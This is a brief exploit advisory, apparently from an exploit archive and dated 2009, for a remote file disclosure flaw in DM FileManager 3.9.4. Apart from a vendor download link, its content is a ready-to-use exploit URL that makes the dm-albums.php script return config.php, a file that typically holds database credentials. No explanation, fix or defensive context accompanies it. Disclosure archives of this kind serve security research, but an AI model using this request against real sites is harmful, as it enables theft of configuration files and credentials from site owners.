id: 5435
date: 06/29/2009
title: DM FileManager 3.9.4 Remote File Disclosure Vulnerability
author: Stack
cves: 

=========================================================
DM FileManager 3.9.4 Remote File Disclosure Vulnerability
=========================================================


#############################################################################################
[+] DM FileManager 3.9.4 Remote File Dislosure Vulnerability
[+] Author : Stack
[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/
#############################################################################################



#  0day.today [2023-03-24]  #